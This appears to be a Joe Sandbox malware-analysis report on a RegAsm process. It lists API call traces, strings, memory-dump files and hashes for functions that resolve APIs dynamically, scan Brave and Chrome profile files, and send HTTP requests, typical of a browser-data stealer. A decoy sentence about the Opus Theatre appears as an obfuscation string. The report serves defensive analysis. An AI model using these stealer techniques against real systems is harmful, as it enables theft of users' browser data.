lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 5acfa23b78d647d16e3131d476f18804c650b7bf61bc6c67ff7474173f5a2b8f
Instruction ID: d74624c404fea8bc3833097cd15bfd8a5e03d1640ee24043f2693d34696df282
Opcode Fuzzy Hash: 5acfa23b78d647d16e3131d476f18804c650b7bf61bc6c67ff7474173f5a2b8f
Instruction Fuzzy Hash: DF41A979740624EBC71C9FE5EC89B997F60AB8C712BA0C062F90299190C7FAD5119B3D

Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,0132F238), ref: 004198A1
GetProcAddress.KERNEL32(75900000,0132F2F8), ref: 004198BA
GetProcAddress.KERNEL32(75900000,0132F340), ref: 004198D2
GetProcAddress.KERNEL32(75900000,0132F388), ref: 004198EA
GetProcAddress.KERNEL32(75900000,0132F268), ref: 00419903
GetProcAddress.KERNEL32(75900000,01332F28), ref: 0041991B
GetProcAddress.KERNEL32(75900000,01332B68), ref: 00419933
GetProcAddress.KERNEL32(75900000,01332AE8), ref: 0041994C
GetProcAddress.KERNEL32(75900000,0132F3A0), ref: 00419964
GetProcAddress.KERNEL32(75900000,0132F3B8), ref: 0041997C
GetProcAddress.KERNEL32(75900000,0132F3D0), ref: 00419995
GetProcAddress.KERNEL32(75900000,0132F4C0), ref: 004199AD
GetProcAddress.KERNEL32(75900000,01332C88), ref: 004199C5
GetProcAddress.KERNEL32(75900000,0132F568), ref: 004199DE
GetProcAddress.KERNEL32(75900000,0132F550), ref: 004199F6
GetProcAddress.KERNEL32(75900000,01332BC8), ref: 00419A0E
GetProcAddress.KERNEL32(75900000,0132F538), ref: 00419A27
GetProcAddress.KERNEL32(75900000,0132F4A8), ref: 00419A3F
GetProcAddress.KERNEL32(75900000,01332BE8), ref: 00419A57
GetProcAddress.KERNEL32(75900000,0132F4D8), ref: 00419A70
GetProcAddress.KERNEL32(75900000,01332C68), ref: 00419A88
LoadLibraryA.KERNEL32(0132F4F0,?,00416A00), ref: 00419A9A
LoadLibraryA.KERNEL32(0132F520,?,00416A00), ref: 00419AAB
LoadLibraryA.KERNEL32(0132F508,?,00416A00), ref: 00419ABD
LoadLibraryA.KERNEL32(0132CAE0,?,00416A00), ref: 00419ACF
LoadLibraryA.KERNEL32(0133A900,?,00416A00), ref: 00419AE0
GetProcAddress.KERNEL32(75070000,0133A918), ref: 00419B02
GetProcAddress.KERNEL32(75FD0000,0133A8A0), ref: 00419B23
GetProcAddress.KERNEL32(75FD0000,0133A930), ref: 00419B3B
GetProcAddress.KERNEL32(75A50000,0133A8E8), ref: 00419B5D
GetProcAddress.KERNEL32(74E50000,01332D08), ref: 00419B7E
GetProcAddress.KERNEL32(76E80000,01332F88), ref: 00419B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6

Strings

NtQueryInformationProcess, xrefs: 00419BAA

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

Function 6C2A35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C32F688,00001000), ref: 6C2A35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2A35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C2A35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C2A363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C2A369F
__aulldiv.LIBCMT ref: 6C2A36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C2A3773
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2A377E
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2A37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C2A37C4
EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2A37CB
LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2A3801
__aulldiv.LIBCMT ref: 6C2A3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C2A3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C2A3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C2A394C

Strings

GenuntelineI, xrefs: 6C2A3639
GTC, xrefs: 6C2A3912
AuthcAMDenti, xrefs: 6C2A3946
MOZ_TIMESTAMP_MODE, xrefs: 6C2A35DB
QPC, xrefs: 6C2A38FC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 22fb02e3b3a1ddb9be0ea405e86eba0ee32e2ad1b848c31aa7bfdf0497680b06
Instruction ID: 08ab5a7718133e019c10db02ee4138bbbe08e971c32879a6b2e76df9ef049b01
Opcode Fuzzy Hash: 22fb02e3b3a1ddb9be0ea405e86eba0ee32e2ad1b848c31aa7bfdf0497680b06
Instruction Fuzzy Hash: 24B1AE71B083119BDF08DF28D845A5ABBF9FB8E705F05892EE89AD7750D738D8058B81

Function 0040BE70 Relevance: 33.9, APIs: 15, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040C7BF
FindClose.KERNEL32(000000FF), ref: 0040C7D1

Strings

Preferences, xrefs: 0040C11E
\Brave\Preferences, xrefs: 0040C1DB
Brave, xrefs: 0040C102
Google Chrome, xrefs: 0040C634

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: c682761d44f5aa90866755697bac6c5d92d7734f1ad5bb28ea9fd79f244d9b70
Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
Opcode Fuzzy Hash: c682761d44f5aa90866755697bac6c5d92d7734f1ad5bb28ea9fd79f244d9b70
Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA

Function 00414910 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041492C
FindFirstFileA.KERNEL32(?,?), ref: 00414943
StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
FindClose.KERNEL32(000000FF), ref: 00414B92

Strings

%s\%s, xrefs: 004149A4
%s\*, xrefs: 00414920
%s\%s, xrefs: 004149FB

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 73d63f0ceacab054b0b74fb993ca077a66fc488422d0900d92cd2fa5397069ad
Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
Opcode Fuzzy Hash: 73d63f0ceacab054b0b74fb993ca077a66fc488422d0900d92cd2fa5397069ad
Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95

Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
StrCmpCA.SHLWAPI(?,013439D8), ref: 0040493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,01343A58), ref: 00404DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
InternetCloseHandle.WININET(00000000), ref: 00404EAD
InternetCloseHandle.WININET(00000000), ref: 00404EC5
HttpOpenRequestA.WININET(00000000,01343A38,?,01343140,00000000,00000000,00400100,00000000), ref: 00404B15

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00404ECF

Strings

", xrefs: 00404BF2
------, xrefs: 00404B28
", xrefs: 00404D33
------, xrefs: 004049BD
------, xrefs: 00404C69

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
